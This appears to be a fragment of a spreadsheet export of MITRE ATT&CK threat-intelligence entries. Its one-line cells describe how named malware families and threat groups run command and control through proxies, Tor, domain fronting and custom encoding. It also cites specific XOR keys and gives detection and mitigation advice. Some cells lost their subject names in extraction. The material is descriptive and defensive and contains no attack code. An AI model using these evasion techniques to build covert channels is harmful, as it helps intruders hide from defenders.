  <si>
    <t>Traffic traversing the [[Software/S0183|Tor]] network will be forwarded to multiple nodes before exiting the [[Software/S0183|Tor]] network and continuing on to its intended destination.[[CiteRef::Dingledine Tor The Second-Generation Onion Router]]</t>
  </si>
  <si>
    <t>Network protocol analysis,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as ) or known adversary infrastructure that uses this technique. ,</t>
  </si>
  <si>
    <t>Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like [[Technique/T1172|Domain Fronting]].</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1188</t>
  </si>
  <si>
    <t>Several [[Group/G0060|BRONZE BUTLER]] tools encode data with base64 when posting it to a C2 server.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0187|Daserf]] uses custom base64 encoding to obfuscate HTTP traffic.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0085|S-Type]] uses Base64 encoding for C2 traffic.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0084|Mis-Type]] uses Base64 encoding for C2 traffic.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0137|CORESHELL]] C2 messages are Base64-encoded.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>C2 traffic from [[Software/S0045|ADVSTORESHELL]] is encrypted, then encoded with Base64 encoding.[[CiteRef::Kaspersky Sofacy]]</t>
  </si>
  <si>
    <t>For C2 over HTTP, [[Software/S0170|Helminth]] encodes data with base64 and sends it via the "Cookie" field of HTTP requests. For C2 over DNS, [[Software/S0170|Helminth]] converts ASCII characters into their hexadecimal values and sends the data in cleartext.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] C2 traffic is base64-encoded.[[CiteRef::Unit 42 SeaDuke 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0083|Misdat]] network traffic is Base64-encoded plaintext.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] used Base64 to encode C2 traffic.[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>A backdoor used by [[Group/G0016|APT29]] created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>Software: meek</t>
  </si>
  <si>
    <t>uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended desitnation.</t>
  </si>
  <si>
    <t>Software: AutoIt backdoor</t>
  </si>
  <si>
    <t>[[Software/S0129|AutoIt backdoor]] has sent a C2 response that was base64-encoded.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0081|Elise]] exfiltrates data using cookie values that are Base64-encoded.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] encodes C2 traffic with base64.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] uses HTTP POST requests with data formatted using a custom protocol.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>Software: RARSTONE</t>
  </si>
  <si>
    <t>[[Software/S0055|RARSTONE]] uses SSL to encrypt its communication with its C2 server.[[CiteRef::Aquino RARSTONE]]</t>
  </si>
  <si>
    <t>[[Software/S0062|DustySky]] has used both HTTP and HTTPS for C2.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>Software: WinMM</t>
  </si>
  <si>
    <t>[[Software/S0059|WinMM]] uses HTTP for C2.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>Software: Sys10</t>
  </si>
  <si>
    <t>[[Software/S0060|Sys10]] uses HTTP for C2.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0159|SNUGRIDE]] communicates with its C2 server over HTTP.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.[[CiteRef::Palo Alto menuPass Feb 2017]][[CiteRef::JPCERT ChChes Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] can communicate to its C2 over HTTP and HTTPS if directed.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] communicates with its C2 server over HTTP.[[CiteRef::F-Secure BlackEnergy 2014]]</t>
  </si>
  <si>
    <t>Software: 4H RAT</t>
  </si>
  <si>
    <t>[[Software/S0065|4H RAT]] uses HTTP for command and control.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>Some variants of [[Software/S0076|FakeM]] use SSL to communicate with C2 servers.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>Software: Psylo</t>
  </si>
  <si>
    <t>[[Software/S0078|Psylo]] uses HTTPS for C2.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0066|3PARA RAT]] uses HTTP for command and control.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used HTTP and DNS for C2.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>Software: httpclient</t>
  </si>
  <si>
    <t>[[Software/S0068|httpclient]] uses HTTP for command and control.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>Software: pngdowner</t>
  </si>
  <si>
    <t>[[Software/S0067|pngdowner]] uses HTTP for command and control.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware has used HTTP and IRC for C2.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0084|Mis-Type]] network traffic can communicate over HTTP.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0086|ZLib]] communicates over HTTP for C2.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0085|S-Type]] uses HTTP for C2.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>Charming Kitten</t>
  </si>
  <si>
    <t>Charming Kitten ,</t>
  </si>
  <si>
    <t>G0058</t>
  </si>
  <si>
    <t>Software: DownPaper</t>
  </si>
  <si>
    <t>communicates to its C2 server over HTTP.[[CiteRef::ClearSky Charming Kitten Dec 2017]]</t>
  </si>
  <si>
    <t>The [[Software/S0030|Carbanak]] malware communicates to its command server using HTTP with an encrypted payload.[[CiteRef::Kaspersky Carbanak]]</t>
  </si>
  <si>
    <t>Software: Sakula, Sakurel, VIPER</t>
  </si>
  <si>
    <t>[[Software/S0074|Sakula]] uses HTTP for C2.[[CiteRef::Dell Sakula]]</t>
  </si>
  <si>
    <t>Software: FLIPSIDE</t>
  </si>
  <si>
    <t>uses RDP to tunnel traffic from a victim environment.[[CiteRef::Mandiant FIN5 GrrCON Oct 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0147|Pteranodon]] can use HTTP for C2.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>A [[Group/G0047|Gamaredon Group]] file stealer can communicate over HTTP for C2.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>Software: Emissary</t>
  </si>
  <si>
    <t>[[Software/S0082|Emissary]] uses HTTP or HTTPS for C2.[[CiteRef::Lotus Blossom Dec 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0081|Elise]] communicates over HTTP or HTTPS for C2.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0037|FIN6]] used the Plink command-line utility to create SSH tunnels to C2 servers.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>Software: POWERSOURCE, DNSMessenger</t>
  </si>
  <si>
    <t>[[Software/S0145|POWERSOURCE]] uses DNS TXT records for C2.[[CiteRef::FireEye FIN7 March 2017]][[CiteRef::Cisco DNSMessenger March 2017]]</t>
  </si>
  <si>
    <t>Software: TEXTMATE, DNSMessenger</t>
  </si>
  <si>
    <t>[[Software/S0146|TEXTMATE]] uses DNS TXT records for C2.[[CiteRef::FireEye FIN7 March 2017]]</t>
  </si>
  <si>
    <t>uses HTTP for C2.[[CiteRef::Forcepoint Felismus Mar 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0041|Strider]] has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.[[CiteRef::Kaspersky ProjectSauron Blog]]</t>
  </si>
  <si>
    <t>Software: netsh, netsh.exe</t>
  </si>
  <si>
    <t>[[Software/S0108|netsh]] can be used to set up a proxy tunnel to allow remote host access to an infected host.[[CiteRef::Securelist fileless attacks Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] uses a tool that captures information from air-gapped computers via an infected USB and transfers it to network-connected computer when the USB is inserted.[[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>Turla</t>
  </si>
  <si>
    <t>Turla Waterbug WhiteBear ,</t>
  </si>
  <si>
    <t>G0010</t>
  </si>
  <si>
    <t>Software: Gazer, WhiteBear</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] identifies a proxy server if it exists and uses it to make HTTP requests.[[CiteRef::ESET Gazer Aug 2017]]</t>
  </si>
  <si>
    <t>is a simple proxy that creates an outbound RDP connection.[[CiteRef::Mandiant FIN5 GrrCON Oct 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used a global service provider's IP as a proxy for C2 traffic from a victim.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] uses multiple proxies to obfuscate network traffic from victims.[[CiteRef::US-CERT FALLCHILL Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0136|USBStealer]] drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.[[CiteRef::ESET Sednit USBStealer 2014]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware uses a unique form of communication encryption that mimics TLS but uses a different encryption method, evading SSL man-in-the-middle decryption attacks.[[CiteRef::Novetta Blockbuster]]</t>
  </si>
  <si>
    <t>uses a custom binary protocol to beacon back to its C2 server.[[CiteRef::US-CERT Volgmer Nov 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used custom DNS Tunneling protocols for C2.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] can communicate to its C2 over TCP using a custom binary protocol.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] uses [[Software/S0154|Cobalt Strike]]'s malleable C2 functionality to blend in with network traffic.[[CiteRef::FireEye APT32 May 2017]][[CiteRef::GitHub Malleable C2]]</t>
  </si>
  <si>
    <t>Part of [[Group/G0007|APT28]]'s operation involved using [[Software/S0023|CHOPSTICK]] modules to copy itself to air-gapped machines, using files written to USB sticks to transfer data and command traffic.[[CiteRef::FireEye APT28]][[CiteRef::ESET Sednit Part 2]][[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] allows adversaries to modify the way the "beacon" payload communicates.  This is called "Malleable C2" in the [[Software/S0154|Cobalt Strike]] manual and is intended to allow a penetration test team to mimic known APT C2 methods.[[CiteRef::cobaltstrike manual]][[CiteRef::GitHub Malleable C2]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can be configured to have commands relayed over a peer-to-peer network of infected hosts.  This can be used to limit the number of egress points, or provide access to a host without direct internet access.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>Software: ComRAT</t>
  </si>
  <si>
    <t>[[Software/S0126|ComRAT]] has used HTTP requests for command and control.[[CiteRef::NorthSec 2015 GData Uroburos Tools]]</t>
  </si>
  <si>
    <t>[[Software/S0072|OwaAuth]] uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>Software: Epic, Tavdig, ...</t>
  </si>
  <si>
    <t>[[Software/S0091|Epic]] implements a command and control protocol over HTTP.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] communicates with its C2 servers over HTTP.[[CiteRef::ESET Gazer Aug 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] is capable of using HTTP, HTTPS, SMTP, and DNS for C2.[[CiteRef::Symantec Remsec IOCs]][[CiteRef::Kaspersky ProjectSauron Full Report]][[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware communicates with its C2 server via HTTPS.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy.  This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.</t>
  </si>
  <si>
    <t>The "ZJ" variant of [[Software/S0031|BACKSPACE]] allows "ZJ link" infections with Internet access to relay traffic from "ZJ listen" to a command server.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>Software: Hikit</t>
  </si>
  <si>
    <t>[[Software/S0009|Hikit]] supports peer connections.[[CiteRef::Axiom]]</t>
  </si>
  <si>
    <t>[[Software/S0023|CHOPSTICK]] used a proxy server between victims and the C2 server.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Software/S0183|Tor]] encapsulates traffic in multiple layers of encryption.[[CiteRef::Dingledine Tor The Second-Generation Onion Router]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims.[[CiteRef::FireEye APT28]] The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router.[[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>Software: XTunnel, X-Tunnel, XAPS</t>
  </si>
  <si>
    <t>[[Software/S0117|XTunnel]] relays traffic between a C2 server and a victim.[[CiteRef::Crowdstrike DNC June 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware uses Caracachs encryption to encrypt C2 payloads.[[CiteRef::Novetta Blockbuster]]</t>
  </si>
  <si>
    <t>The C2 server response to a beacon sent by a variant of [[Software/S0082|Emissary]] contains a 36-character GUID value that is used as an encryption key for subsequent network communications. Some variants of [[Software/S0082|Emissary]] use various XOR operations to encrypt C2 data.[[CiteRef::Lotus Blossom Dec 2015]]</t>
  </si>
  <si>
    <t>Several [[Group/G0032|Lazarus Group]] malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation.[[CiteRef::Novetta Blockbuster Destructive Malware]]</t>
  </si>
  <si>
    <t>Software: FALLCHILL</t>
  </si>
  <si>
    <t>uses fake Transport Layer Security (TLS) to communicate with its C2 server, encoding data with RC4 encryption.[[CiteRef::US-CERT FALLCHILL Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] can encrypt C2 data with a custom technique using MD5, base64-encoding, and RC4.[[CiteRef::Palo Alto menuPass Feb 2017]][[CiteRef::JPCERT ChChes Feb 2017]]</t>
  </si>
  <si>
    <t>Software: Lurid, Enfal</t>
  </si>
  <si>
    <t>[[Software/S0010|Lurid]] performs XOR encryption.[[CiteRef::Villeneuve 2011]]</t>
  </si>
  <si>
    <t>[[Software/S0060|Sys10]] uses an XOR 0x1 loop to encrypt its C2 domain.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] encrypts C2 data with a ROR by 3 and an XOR by 0x23.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0021|Derusbi]] obfuscates C2 traffic with variable 4-byte XOR keys.[[CiteRef::Fidelis Turbo]]</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] contains a custom version of the RC4 algorithm that includes a programming error.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>Before being appended to image files, [[Software/S0037|HAMMERTOSS]] commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.[[CiteRef::FireEye APT29]]</t>
  </si>
  <si>
    <t>[[Software/S0009|Hikit]] performs XOR encryption.[[CiteRef::Axiom]]</t>
  </si>
  <si>
    <t>[[Software/S0074|Sakula]] encodes C2 traffic with single-byte XOR keys.[[CiteRef::Dell Sakula]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]]'s "beacon" payload can receive C2 from one protocol and respond on another.  This is typically a mixture of HTTP, HTTPS, and DNS traffic.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Software/S0013|PlugX]] can be configured to use multiple network protocols to avoid network-based detection.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>Some [[Group/G0032|Lazarus Group]] malware uses multiple channels for C2, such as RomeoWhiskey-Two, which consists of a RAT channel that parses data in datagram form and a Proxy channel that forms virtual point-to-point sessions.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>[[Software/S0065|4H RAT]] obfuscates C2 communication using a 1-byte XOR with the key 0xBE.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Software/S0066|3PARA RAT]] will use an 8-byte XOR key derived from the string HYF54&amp;%9&amp;jkMCXuiS instead if the DES decoding fails.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Software/S0068|httpclient]] encrypts C2 content with XOR using a single byte, 0x12.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] encrypts C2 traffic with a custom RC4 variant.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] uses custom encryption for C2 using 3DES and RSA.[[CiteRef::ESET Gazer Aug 2017]][[CiteRef::Securelist WhiteBear Aug 2017]]</t>
  </si>
  <si>
    <t>Some  samples use a custom encryption method for C2 traffic using AES, base64 encoding, and multiple keys.[[CiteRef::Forcepoint Felismus Mar 2017]]</t>
  </si>
  <si>
    <t>The original variant of [[Software/S0076|FakeM]] encrypts C2 traffic using a custom encryption cipher that uses an XOR key of ?YHCRA? and bit rotation between each XOR operation. [[Software/S0076|FakeM]] has also included HTML code in C2 traffic in an apparent attempt to evade detection. Additionally, some variants of [[Software/S0076|FakeM]] use modified SSL code for communications back to C2 servers, making SSL decryption ineffective.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>The [[Software/S0162|Komplex]] C2 channel uses an 11-byte XOR algorithm to hide data [[CiteRef::Sofacy Komplex Trojan]].</t>
  </si>
  <si>
    <t>[[Software/S0076|FakeM]] C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>After encrypting C2 data, [[Software/S0128|BADNEWS]] converts it into a hexadecimal representation and then encodes it into base64.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>Some [[Software/S0093|Backdoor.Oldrea]] samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>Software: BISCUIT</t>
  </si>
  <si>
    <t>[[Software/S0017|BISCUIT]] malware contains a secondary fallback command and control server that is contacted after the primary command and control server.[[CiteRef::Mandiant APT1 Appendix]]</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] tests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails.[[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>The C2 server used by [[Software/S0117|XTunnel]] provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Software/S0023|CHOPSTICK]] can switch to a new C2 channel if the current one is broken.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>Newer variants of [[Software/S0031|BACKSPACE]] will encode C2 communications with a custom system.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0037|HAMMERTOSS]] is controlled via commands that are appended to image files.[[CiteRef::FireEye APT29]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] added "junk data" to each encoded string, preventing trivial decoding without knowledge of the junk removal algorithm. Each implant was given a "junk length" value when created, tracked by the controller software to allow seamless communication but prevent analysis of the command protocol on the wire.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] can use base64 encoded C2 communications.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0187|Daserf]] can use steganography to hide malicious code downloaded to the victim.[[CiteRef::Trend Micro Daserf Nov 2017]]</t>
  </si>
  <si>
    <t>Some malware that has been used by [[Group/G0001|Axiom]] uses steganography to hide communication in PNG image files.[[CiteRef::Axiom]]</t>
  </si>
  <si>
    <t>The [[Group/G0001|Axiom]] group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate.[[CiteRef::Axiom]]</t>
  </si>
  <si>
    <t>[[Software/S0058|SslMM]] has a hard-coded primary and backup C2 string.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0059|WinMM]] is usually configured with primary and backup domains for C2 communications.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0062|DustySky]] has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP.[[CiteRef::OilRig ISMAgent July 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0137|CORESHELL]] C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>Software: Ixeshe</t>
  </si>
  <si>
    <t>The [[Software/S0015|Ixeshe]] malware uses custom Base64 encoding schemes to obfuscate data command and control traffic in the message body of HTTP requests.[[CiteRef::Moran 2013]]</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] has the capability to communicate over a backup channel via plus.google.com.[[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0021|Derusbi]] uses a backup communication method with an HTTP beacon.[[CiteRef::Fidelis Turbo]]</t>
  </si>
  <si>
    <t>[[Software/S0034|NETEAGLE]] will attempt to detect if the infected host is configured to a proxy. If so, [[Software/S0034|NETEAGLE]] will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0051|MiniDuke]] uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.[[CiteRef::Securelist MiniDuke Feb 2013]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, and if the transmission fails, chooses a new C2 server to attempt the transmission again.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>[[Software/S0084|Mis-Type]] first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0085|S-Type]] primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0117|XTunnel]] uses SSL/TLS and RC4 to encrypt traffic.[[CiteRef::Invincea XTunnel]][[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>A variant of [[Software/S0045|ADVSTORESHELL]] encrypts some C2 with 3DES and RSA.[[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0005|APT12]] has used the [[Software/S0003|RIPTIDE]] RAT, which communicates over HTTP with a payload encrypted with RC4.[[CiteRef::Moran 2014]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] used the Plink utility and other tools to create tunnels to C2 servers.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] C2 traffic has been encrypted with RC4 and AES.[[CiteRef::Unit 42 SeaDuke 2015]][[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>Software: POSHSPY</t>
  </si>
  <si>
    <t>[[Software/S0150|POSHSPY]] encrypts C2 traffic with AES and RSA.[[CiteRef::FireEye POSHSPY April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0034|NETEAGLE]] will decrypt resources it downloads with HTTP requests by using RC4 with the key "ScoutEagle."[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0187|Daserf]] uses RC4 encryption to obfuscate HTTP traffic.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0030|Carbanak]] encrypts the message body of HTTP traffic with RC2 and Base64 encoding.[[CiteRef::Kaspersky Carbanak]]</t>
  </si>
  <si>
    <t>[[Software/S0023|CHOPSTICK]] encrypts C2 communications with RC4 as well as TLS.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>Some  use SSL to encrypt C2 communications.[[CiteRef::US-CERT Volgmer Nov 2017]]</t>
  </si>
  <si>
    <t>Command and Control,Lateral Movement</t>
  </si>
  <si>
    <t>Remote File Copy</t>
  </si>
  <si>
    <t>FIN10</t>
  </si>
  <si>
    <t>FIN10 ,</t>
  </si>
  <si>
    <t>G0051</t>
  </si>
  <si>
    <t>[[Group/G0051|FIN10]] has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.[[CiteRef::FireEye FIN10 June 2017]]</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.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used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP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C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1105</t>
  </si>
  <si>
    <t>[[Group/G0046|FIN7]] uses a PowerShell script to launch shellcode that retrieves an additional payload.[[CiteRef::FireEye FIN7 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0147|Pteranodon]] can download and execute additional files.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0145|POWERSOURCE]] has been observed being used to download [[Software/S0146|TEXTMATE]] and the Cobalt Strike Beacon payload onto victims.[[CiteRef::FireEye FIN7 March 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] downloaded tools from a remote server after they were inside the victim network.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0094|Trojan.Karagany]] can upload, download, and execute files on the victim.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Software/S0083|Misdat]] is capable of downloading files from the C2.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0086|ZLib]] has the ability to download files.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>Tools used by [[Group/G0047|Gamaredon Group]] are capable of downloading and executing additional payloads.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
